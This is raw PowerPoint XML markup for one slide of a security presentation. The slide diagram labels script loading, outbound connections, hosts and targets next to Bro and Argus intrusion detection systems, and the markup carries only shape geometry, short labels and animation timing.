            <a:ext cx="679450" cy="649288"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2246" name="Text Box 198"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2526786">
            <a:off x="4191000" y="6019800"/>
            <a:ext cx="5175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Recipients</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2247" name="Object 199"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4718050" y="6272213"/>
          <a:ext cx="590550" cy="400050"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2139" name="Visio" r:id="rId21" imgW="2654300" imgH="1816100" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2248" name="Text Box 200"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2413000" y="2762250"/>
            <a:ext cx="996950"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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> Outbound connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2249" name="Text Box 201"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="4058826">
            <a:off x="2076450" y="2762250"/>
            <a:ext cx="996950"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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> Outbound connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2250" name="AutoShape 202"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2134" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2803525" y="879475"/>
            <a:ext cx="15875" cy="1025525"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2251" name="Text Box 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2620962" y="1371601"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2252" name="Text Box 204"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2043112" y="1554163"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2253" name="AutoShape 205"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2133" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2238375" y="1347788"/>
            <a:ext cx="9525" cy="557212"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2254" name="Text Box 206"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="327025" y="2308225"/>
            <a:ext cx="533400"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Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2255" name="AutoShape 207"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2140" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1143000" y="1169988"/>
            <a:ext cx="895350" cy="668337"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2256" name="Text Box 208"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="19426974">
            <a:off x="1371600" y="1295400"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2257" name="AutoShape 209"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2140" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="647700" y="685800"/>
            <a:ext cx="647700" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2258" name="AutoShape 210"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1341438" y="668338"/>
            <a:ext cx="1292225" cy="17462"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2259" name="Text Box 211"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="18357841">
            <a:off x="639762" y="1004888"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2357" name="Text Box 309"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2021686">
            <a:off x="7391400" y="609600"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2358" name="AutoShape 310"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2126" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3003550"/>
            <a:ext cx="385763" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2359" name="AutoShape 311"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2120" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4956175" y="2241550"/>
            <a:ext cx="301625" cy="830263"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2360" name="AutoShape 312"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2121" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3810000" y="1447800"/>
            <a:ext cx="714375" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2361" name="AutoShape 313"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2120" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4524375" y="1447800"/>
            <a:ext cx="733425" cy="425450"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2362" name="Text Box 314"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1703527">
            <a:off x="4638675" y="1549400"/>
            <a:ext cx="6318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Load Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2363" name="Text Box 315"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6687257">
            <a:off x="4906962" y="2620963"/>
            <a:ext cx="5175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Host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2364" name="Text Box 316"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2058314">
            <a:off x="4419600" y="2971800"/>
            <a:ext cx="393700"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Host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2365" name="Text Box 317"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="19974039">
            <a:off x="3810000" y="1524000"/>
            <a:ext cx="6318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Load Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2366" name="Text Box 318"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4816475" y="3521075"/>
            <a:ext cx="393700"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latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2367" name="Text Box 319"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3554412" y="2433638"/>
            <a:ext cx="631825"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solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Run Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2368" name="Text Box 320"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5640851">
            <a:off x="4778375" y="4473575"/>
            <a:ext cx="469900" cy="184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600">
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Targets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2369" name="Text Box 321"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1765300" y="6251575"/>
            <a:ext cx="1262063" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Signature IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Bro &amp; Argus IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2370" name="AutoShape 322"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="762000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2371" name="AutoShape 323"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6553200"/>
            <a:ext cx="762000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Slide Number Placeholder 117"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Footer Placeholder 120"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a: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01668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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2053"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2057"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2054"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2058"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2058"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2055"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="236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366"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="236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68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2368"/>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2368"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2368"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2368"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="236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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10"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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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72"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2072"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="46" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2074"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2074"/>
                                        </p:tgtEl>
